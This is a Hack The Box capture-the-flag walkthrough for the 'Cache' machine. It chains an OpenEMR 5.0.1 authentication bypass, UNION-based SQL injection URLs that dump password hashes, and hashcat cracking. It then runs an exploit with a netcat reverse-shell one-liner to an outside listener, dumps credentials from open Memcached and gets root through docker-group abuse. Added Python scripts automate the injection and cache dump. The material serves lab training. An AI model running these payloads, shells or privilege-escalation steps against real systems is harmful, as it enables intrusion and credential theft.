HTB Walkthrough: Cache

Today we are going to solve another boot2root challenge from Hack The Box called "Cache", created by ASHacker. So without wasting time, let's start.

Level : Intermediate

Task : To root the machine and collect user and root flag.

Attacking Strategy

  • Scanning
  • Enumeration
    • OpenEMR 5.0.1 vulnerabilities
  • Exploitation
    • SQL injection and authenticated RCE
  • Privilege Escalation
    • Memcached and the docker group

Scanning

We start with a rustscan sweep, which reports two open ports: 22 (SSH) and 80 (HTTP).

rustscan --ulimit 5001 -a 10.129.2.219 -- -sC -sV

Port 80 serves a web page titled "Cache" with links such as Home, News, Contact us, Authors and Login. The login page is the obvious place to start digging.

Trying some default credentials on the login page, we notice that the form never sends a request to the server: the result is produced entirely in the browser, so the authentication check is static, client-side code. Using the browser's inspector we go through the scripts loaded by the page and find a JavaScript function in functionality.js that contains hard-coded credentials.

These credentials log us in, but there is nothing interesting behind the login, and they do not work over SSH either. Digging further, the Authors page mentions that the authors are also working on another project, with its own hostname. We add that hostname to our hosts file and visit it.

Visiting hms.htb, we find an OpenEMR installation with a 2018 copyright notice. A quick search shows that the 2018 release is OpenEMR 5.0.1, which has several serious vulnerabilities; you can read the report here.

Exploitation

After reading the vulnerability report, the first step is to bypass the login, which the report describes for the Patient Portal. We open the portal's registration page and, with Burp Suite, modify the request so that it lands on the page we actually want to reach.

Here we can see the registration request being sent as a new user.

Change the requested URL to the portal page you want to reach directly.

With that, we have successfully bypassed the portal's authentication.

Now it's time for the second vulnerability: SQL injection. According to the report, the injection point is the add_edit_event_user.php page, so we fuzz its parameters there.

From Report

SQL injection in add_edit_event_user.php is caused by unsanitized user input from the eid, userid, and pid parameters. Exploiting this vulnerability requires authentication to PatientPortal; however, it can be exploited without authentication when combined with the PatientPortal authentication bypass.

http://hms.htb/portal/add_edit_event_user.php?eid=1

Having confirmed the injection, the next step is to extract something useful from the database: credentials, or anything else that helps.

First we need the number of columns in the original query. Increasing the ORDER BY index until the page errors shows there are four columns (ORDER BY 4 works, ORDER BY 5 fails). Next we find which of the four columns is reflected in the page, so that we can place our data there with a UNION SELECT.

http://hms.htb/portal/add_edit_event_user.php?eid=1 order by 4

Now let's check the database version, using the third column as the reflected one:

http://hms.htb/portal/add_edit_event_user.php?eid=1+union+select+null,null,version(),null
http://hms.htb/portal/add_edit_event_user.php?eid=1+union+select+null,null,database(),null

The second request, with database(), tells us the current database is named "openemr".

Now that we know the database, let's list its tables. The openemr schema has far too many tables to fit on the error page, so we filter on the table name; after filtering we get tables such as users and users_secure.

http://hms.htb/portal/add_edit_event_user.php?eid=1+union+select+null,null,group_concat(table_name),null from information_schema.tables where table_schema='openemr' and table_name like 'user%'

With the table names in hand, we list the columns. We dumped the columns of every candidate table, but the data we need is in users_secure.

http://hms.htb/portal/add_edit_event_user.php?eid=1+union+select+null,null,group_concat(column_name),null from information_schema.columns where table_name='users_secure'

The columns of users_secure include id, username, password, salt and last_update. Two of them are exactly what we want: username and password.

First we dump the usernames:

http://hms.htb/portal/add_edit_event_user.php?eid=1+union+select+null,null,group_concat(username),null from users_secure

Then the password hashes for those users:

http://hms.htb/portal/add_edit_event_user.php?eid=1+union+select+null,null,group_concat(Password),null from users_secure
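The whole sequence above (find the column count with ORDER BY, then pull data through a UNION SELECT into the reflected column) can be reproduced offline. The script below is an added example, not code from the walkthrough or from OpenEMR: it builds a constructed, in-memory SQLite database with a four-column events table and a users_secure table holding a fake hash, concatenates the eid parameter into the query exactly the way the vulnerable page does, and then automates the same ORDER BY and UNION steps. The table and column names, the sample rows and the hash value are all made up for the example, and SQLite's sqlite_master stands in for MySQL's information_schema. A parameterised lookup is included beside the vulnerable one to show that the same payloads do nothing against it.

```python
import sqlite3

# Constructed stand-in for the target's schema (not OpenEMR's real tables).
# events has four columns, matching the "ORDER BY 4 works, 5 fails" finding.
# The bcrypt-looking hash is a fake placeholder, not a real credential.
FAKE_HASH = "$2a$05$constructedFakeHashValueForTheExampleOnly"


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(f"""
        CREATE TABLE events (id INTEGER, title TEXT, body TEXT, event_date TEXT);
        INSERT INTO events VALUES (1, 'Checkup', 'Annual checkup', '2018-03-01');
        CREATE TABLE users_secure (id INTEGER, username TEXT, password TEXT, salt TEXT);
        INSERT INTO users_secure VALUES (1, 'openemr_admin', '{FAKE_HASH}', NULL);
    """)
    return conn


def vulnerable_lookup(conn, eid):
    # The flaw: eid goes straight into the SQL text, like add_edit_event_user.php?eid=...
    sql = f"SELECT id, title, body, event_date FROM events WHERE id = {eid}"
    return conn.execute(sql).fetchall()


def safe_lookup(conn, eid):
    # Hardened form: eid is bound as a value, so "1 ORDER BY 5" is just a string.
    sql = "SELECT id, title, body, event_date FROM events WHERE id = ?"
    return conn.execute(sql, (eid,)).fetchall()


def find_column_count(conn, max_cols=20):
    # Increase ORDER BY n until the database errors; the last working n is the count.
    for n in range(1, max_cols + 1):
        try:
            vulnerable_lookup(conn, f"1 ORDER BY {n}")
        except sqlite3.OperationalError:
            return n - 1
    return None


def extract(conn, expr, ncols, from_clause="", pos=2):
    # Put expr into the reflected column (index pos) and pad the rest with NULLs,
    # i.e. "1 UNION SELECT null,null,<expr>,null [FROM ... WHERE ...]".
    cols = ["null"] * ncols
    cols[pos] = expr
    payload = f"1 UNION SELECT {','.join(cols)} {from_clause}".rstrip()
    rows = vulnerable_lookup(conn, payload)
    # The injected row is the one whose id column is NULL.
    return next(r[pos] for r in rows if r[0] is None)


def dump_users_secure(conn):
    # Same chain as the walkthrough: version, tables, columns, usernames, hashes.
    n = find_column_count(conn)
    return {
        "columns": n,
        "version": extract(conn, "sqlite_version()", n),
        "tables": extract(conn, "group_concat(name)", n,
                          "FROM sqlite_master WHERE type='table' AND name LIKE 'user%'"),
        "usernames": extract(conn, "group_concat(username)", n, "FROM users_secure"),
        "hashes": extract(conn, "group_concat(password)", n, "FROM users_secure"),
    }


if __name__ == "__main__":
    db = build_db()
    for k, v in dump_users_secure(db).items():
        print(f"{k}: {v}")
    print("parameterised lookup with payload:", safe_lookup(db, "1 ORDER BY 5"))
```

Against the real target the only thing that changes is the transport: the payload is URL-encoded into the eid parameter and the reflected value is read out of the error page instead of the returned row.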

Now we have a hash. First we identify its type; hashcat recognises it as bcrypt (mode 3200), so let's crack it with rockyou:

sudo hashcat -m 3200 hash Desktop/HTB/rockyou.txt

The hash cracks successfully. The recovered credentials do not work over SSH, so we dig further and find an exploit for this OpenEMR version that requires authentication. Since we now have valid credentials, let's give it a try.

searchsploit openemr 5.0.1
searchsploit -m 45161 

After reading through the exploit we run it with a reverse shell payload; make sure to replace the username, password and listener address with your own.

python 45161.py http://hms.htb -u xxxxxxx -p xxxxxx -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.68 1234 >/tmp/f'

Privilege Escalation

Now we have a shell. The credentials we found at the very start, in functionality.js, belong to the user ash: switching to that user with them works, and we have our first flag.

Now it's time to go for root. Checking the services listening on localhost, we notice something odd: port 11211 is open, which is normally used by Memcached. Because it is misconfigured (no authentication on the text protocol), we can connect to it with telnet and dump the cached data.

telnet 127.0.0.1 11211 
version
stats cachedump 1 0
get user
get passwd
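The telnet session above guesses slab 1 and the key names. The script below is an added example (not part of the walkthrough) that speaks the same Memcached text protocol but enumerates instead of guessing: it asks for stats items to learn which slab classes hold data, runs stats cachedump on each of them, then fetches every key with get. To run offline it starts a small fake Memcached server on localhost with constructed keys; the values "luffy" and "constructed-secret" are placeholders, not the box's real data. Point dump_memcached() at 127.0.0.1:11211 on the target to use it for real.

```python
import re
import socket
import socketserver
import threading

# Constructed cache contents for the fake server (not the real box's values).
STORE = {"user": b"luffy", "passwd": b"constructed-secret"}


class FakeMemcached(socketserver.StreamRequestHandler):
    """Minimal stand-in for an unauthenticated memcached text-protocol server."""

    def handle(self):
        while True:
            raw = self.rfile.readline()
            if not raw:
                return
            parts = raw.decode().split()
            if not parts or parts[0] == "quit":
                return
            if parts[0] == "version":
                self.wfile.write(b"VERSION 1.5.6\r\n")
            elif parts[:2] == ["stats", "items"]:
                self.wfile.write(f"STAT items:1:number {len(STORE)}\r\nEND\r\n".encode())
            elif parts[:2] == ["stats", "cachedump"]:
                out = "".join(f"ITEM {k} [{len(v)} b; 0 s]\r\n" for k, v in STORE.items())
                self.wfile.write((out + "END\r\n").encode())
            elif parts[0] == "get":
                out = b""
                for k in parts[1:]:
                    if k in STORE:
                        out += f"VALUE {k} 0 {len(STORE[k])}\r\n".encode() + STORE[k] + b"\r\n"
                self.wfile.write(out + b"END\r\n")
            else:
                self.wfile.write(b"ERROR\r\n")


def _command(f, text):
    """Send one command; return the response lines, with VALUE data as (key, bytes)."""
    f.write(text.encode() + b"\r\n")
    f.flush()
    lines = []
    while True:
        raw = f.readline()
        if not raw:
            break
        line = raw.decode().rstrip("\r\n")
        if line.startswith("VALUE "):
            key, nbytes = line.split()[1], int(line.split()[3])
            lines.append((key, f.read(nbytes + 2)[:-2]))  # data block plus CRLF
            continue
        lines.append(line)
        if line in ("END", "ERROR") or line.startswith("VERSION"):
            break
    return lines


def dump_memcached(host, port):
    """Enumerate slab classes, list their keys, and fetch every value."""
    with socket.create_connection((host, port)) as s:
        f = s.makefile("rwb")
        slabs = sorted({int(m.group(1)) for line in _command(f, "stats items")
                        if isinstance(line, str)
                        for m in [re.match(r"STAT items:(\d+):", line)] if m})
        keys = [line.split()[1] for slab in slabs
                for line in _command(f, f"stats cachedump {slab} 0")
                if isinstance(line, str) and line.startswith("ITEM ")]
        found = {}
        for key in keys:
            for item in _command(f, f"get {key}"):
                if isinstance(item, tuple):
                    found[item[0]] = item[1]
        return found


def demo():
    """Run the client against the fake server on an ephemeral localhost port."""
    server = socketserver.TCPServer(("127.0.0.1", 0), FakeMemcached)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        return dump_memcached(*server.server_address)
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k} = {v.decode()}")
```

On a real server stats cachedump only returns up to the first 2 MB of each slab's item list and is a debugging command that some builds disable, so an empty ITEM list does not prove the cache holds nothing.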

Now we have a username and password from the cache, and they work for SSH. Once logged in, we find something very interesting: this user is a member of the docker group. For the administrator that is a serious issue; for an attacker it is the jackpot, because docker group membership is effectively root.

Let's get root by abusing the Docker service. We start an Ubuntu container with the host's file system mounted inside it, open an interactive shell in the container, and from there copy a bash binary onto the host's file system with the SUID bit and execute permission set. You can read more about Docker exploitation here.

docker images
docker pull ubuntu
docker images
docker run -it -v /:/mnt ubuntu
cd /mnt
which bash
cp /bin/bash /mnt/home/luffy/
cd /mnt/home/luffy/
chmod +xs bash

Once that is done, we exit back to the host, where the SUID bash we copied is waiting in luffy's home directory. Running it with -p keeps the effective root privileges, and we finally have root on the target.

./bash -p
